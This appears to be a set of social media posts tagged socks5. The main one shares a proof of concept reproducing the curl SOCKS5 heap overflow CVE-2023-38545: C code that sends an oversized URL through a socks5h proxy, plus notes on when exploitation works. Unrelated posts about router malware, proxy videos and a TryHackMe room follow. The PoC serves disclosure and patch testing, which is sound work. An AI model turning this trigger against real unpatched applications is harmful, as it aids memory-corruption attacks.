Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

Malware turns home routers into proxies for Chinese state-sponsored hackers - Enlarge (credit: Getty Images)

Researchers on Tuesday unveiled... - https://arstechnica.com/?p=1939749 #homerouters #proxies #tp-link #biz⁢ #socks5

Firefox Multi-Account Containers with Tor and SSH Proxies

https://tilvids.com/videos/watch/fd594998-00af-4360-b97b-e3bdf1d0cace

Network Security Protocols - I have just completed this room! Check it out: https://tryhackme.com/room/networksecurityprotocols #tryhackme #security #https #ftps #ssh #ipsec #smtps #dnssec #pop3s #socks5 #AH #ESP #TLS #SSL #VPN #networksecurityprotocols via @RealTryHackMe